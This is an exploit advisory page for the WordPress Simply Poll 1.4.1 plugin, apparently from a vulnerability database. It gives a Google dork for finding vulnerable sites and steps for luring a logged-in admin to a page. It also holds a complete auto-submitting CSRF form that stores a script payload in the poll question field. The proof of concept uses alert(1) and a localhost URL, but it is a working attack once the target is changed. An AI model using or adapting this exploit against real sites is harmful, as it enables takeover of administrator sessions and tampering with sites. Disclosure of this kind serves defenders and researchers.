WordPress Simply Poll Plugin 1.4.1 CSRF and stored XSS

2013.03.18
Credit: m3tamantra
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
CWE-352
Dork: inurl:\"/wp-content/plugins/simply-poll

# Exploit Title: WordPress Simply Poll Plugin 1.4.1 CSRF and stored XSS # Google Dork: inurl:"/wp-content/plugins/simply-poll # Date: 16.03.2013 # Exploit Author: m3tamantra # Vendor Homepage: http://wordpress.org/extend/plugins/simply-poll/ # Software Link: http://downloads.wordpress.org/plugin/simply-poll.1.4.1.zip # Version: 1.4.1 # Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) Note: After a email to plugins@wordpress.org, "Simply Poll Plugin" was deleted. Description: - The question parameter is vulnerable to XSS - Simply Poll has an CSRF vulnerability (Polls=>Add New) The PoC leads to arbitrary javascript execution in back-end area. Steps to exploit the Flaw: - Save PoC code in html file - Send a link (pointing to the PoC html file) to a logged in admin - When Admin view the Page he will automatically add a new Poll which exploits an XSS vulnerability in the question parameter - When the admin views the Polls the javascript Code will execute Note: this was just an example, it is also possible to remove, reset and edit all Polls. [code] <html> <head> <title>Simply Poll CSRF and XSS</title> </head> <body> <!-- replace "127.0.0.1:9001/wordpress" --> <form action="http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=sp-add" method="post"> <input type="hidden" name="question" value='Is CSRF+XSS possible?<script>alert(1)</script>' /> <input type="hidden" name="answers[1][answer]" value="yes" /> <input type="hidden" name="answers[2][answer]" value="no" /> <input type="hidden" name="answers[3][answer]" value="maybe" /> <input type="hidden" name="answers[4][answer]" value="" /> <input type="hidden" name="answers[5][answer]" value="" /> <input type="hidden" name="answers[4][answer]" value="" /> <input type="hidden" name="answers[6][answer]" value="" /> <input type="hidden" name="answers[7][answer]" value="" /> <input type="hidden" name="answers[8][answer]" value="" /> <input type="hidden" name="answers[9][answer]" value="" /> <input type="hidden" name="answers[10][answer]" value="" /> <input type="hidden" name="polledit" value="new" /> </form> <script>document.forms[0].submit();</script> </body> </html> [/code]

References:

http://downloads.wordpress.org/plugin/simply-poll.1.4.1.zip


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top